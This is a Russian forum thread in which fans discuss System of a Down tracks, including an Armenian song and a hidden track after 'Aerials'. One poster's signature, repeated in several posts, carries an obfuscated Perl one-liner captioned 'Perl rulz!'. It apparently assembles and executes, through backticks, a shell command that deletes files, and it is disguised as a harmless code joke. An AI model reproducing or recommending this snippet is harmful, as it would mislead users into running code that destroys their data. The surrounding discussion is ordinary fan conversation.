Добавлено: Чт Май 29, 2008 11:38 pm Заголовок сообщения:
исполняли на концерте im nazelis, но это не их песня _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
$!=~/(.)(.).(.)(.)(.)(.)..(.)(.)(.)..(.)......(.)/,$"),$=++;$.++;$.++;
$_++;$_++;($_,$\,$,)=($~.$"."$;$/$%[$?]$_$\$,$:$%[$?]",$"&$~,$#,);$,++
;$,++;$^|=$";`$_$\$,$/$:$;$~$*$%[$?]$.$~$*${#}$%[$?]$;$\$"$^$~$*.>&$=`
Perl rulz!
Добавлено: Пт Июн 06, 2008 12:04 am Заголовок сообщения:
Чувак!Как мне в последнее время полюбилось это слово! _________________ Жаркая пустыня Дагестана.За высоким барханом лежит труп.Это мой,мой,мой труп лежит.Из свежей раны течёт кровь.Это моя,моя,моя кровь течёт.И в жаркой пустыне Дагестана за высоким барханом чей-то труп знакомый валяется!Это мой труп!Нет.Это твой труп?Нет.Это наш труп!И из ещё дымящейся раны течёт алая кровь.
Раз уж Абсурд говорит,что неплохо вышло,то и я хочу! _________________ Жаркая пустыня Дагестана.За высоким барханом лежит труп.Это мой,мой,мой труп лежит.Из свежей раны течёт кровь.Это моя,моя,моя кровь течёт.И в жаркой пустыне Дагестана за высоким барханом чей-то труп знакомый валяется!Это мой труп!Нет.Это твой труп?Нет.Это наш труп!И из ещё дымящейся раны течёт алая кровь.
Добавлено: Вс Мар 22, 2009 5:56 pm Заголовок сообщения:
Знаю что в альбоме Toxicity есть песня а армянском....Но где её достать не наю _________________ "Да я бы сдохла с радостью! Только, вот, радости от этого не будет никакой..."(с)
Добавлено: Вс Мар 22, 2009 6:05 pm Заголовок сообщения:
Ecce ancilla Domini
та что в конце на алиалсе прицеплена? _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
Perl rulz!
Добавлено: Вс Мар 22, 2009 6:10 pm Заголовок сообщения:
нет,я не об этой..........там песня какая-то,которую на похоронах поют......... _________________ "Да я бы сдохла с радостью! Только, вот, радости от этого не будет никакой..."(с)
Добавлено: Вс Мар 22, 2009 6:49 pm Заголовок сообщения:
http://www.soad.msk.ru/songs/arto.html
ну и я про нее) она на ариалсе сидит в качестве скрытого трека) _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
Perl rulz!
Добавлено: Вс Мар 22, 2009 7:46 pm Заголовок сообщения:
хм........как-то эта после ариалс на похоронную не похожа........ _________________ "Да я бы сдохла с радостью! Только, вот, радости от этого не будет никакой..."(с)
Добавлено: Вс Мар 22, 2009 8:07 pm Заголовок сообщения:
а мне кажется, очень даже)
думаю, это потому что у разных культур свое понятие о трауре и похоронах, в японии например цвет траура - белый _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
Perl rulz!
Добавлено: Вс Мар 22, 2009 8:12 pm Заголовок сообщения:
[quote="ALuserX"]в японии например цвет траура - белый[/quote]
для меня чёрный цвет не траурный
не........всё равно траурные можно узнать...ну эта...вряд ли...хотя,кто её знает _________________ "Да я бы сдохла с радостью! Только, вот, радости от этого не будет никакой..."(с)
Добавлено: Вс Мар 22, 2009 8:30 pm Заголовок сообщения:
для меня тоже (=
в нашем описании песни, кстати, не сказано, что она похоронная) просто заклинание мертвых) так что не факт, что похоронная)
вооот..) _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
Perl rulz!
Добавлено: Вс Мар 22, 2009 11:08 pm Заголовок сообщения:
в описании сказано что ее играли в живую, где можно посмотреть?? _________________ Купил казак Мамай видак,
крутил его и так, и сяк.
Морали в этой басне нету,
купил видак - купи касету!